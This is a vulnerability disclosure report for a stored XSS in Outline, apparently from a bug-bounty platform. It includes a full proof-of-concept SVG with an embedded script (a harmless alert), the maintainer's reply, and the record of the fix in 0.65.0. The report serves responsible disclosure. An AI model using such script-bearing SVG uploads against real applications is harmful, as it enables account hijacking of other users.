xss via svg file in outline/outline

Valid

Reported on

Jul 1st 2022


Description

xss via svg file

Proof of Concept

1. goto your account and create a document under a collection .
2. Now edit this document and upload bellow svg file in this document content as image

filename-->evil.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" >
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('Thais app is probably vulnerable to XSS attackss!');
   </script>
</svg>

3. after upload open the svg file url and see xss is executed

Impact

xss to control victim account

We are processing your report and will contact the outline team within 24 hours. 2 years ago
ranjit-git modified the report
2 years ago
We have contacted a member of the outline team and are waiting to hear back 2 years ago
Tom Moor
2 years ago

Maintainer


Scripts within SVG's is a feature of the format, it is not inherently a bug or security issue. Images are hosted on a completely separate domain without any cookies or other user data, are you able to prove xss to control victim account?

ranjit-git modified the report
2 years ago
outline/outline maintainer has acknowledged this report 2 years ago
Tom Moor validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor marked this as fixed in 0.65.0 with commit 206545 2 years ago
The fix bounty has been dropped
to join this conversation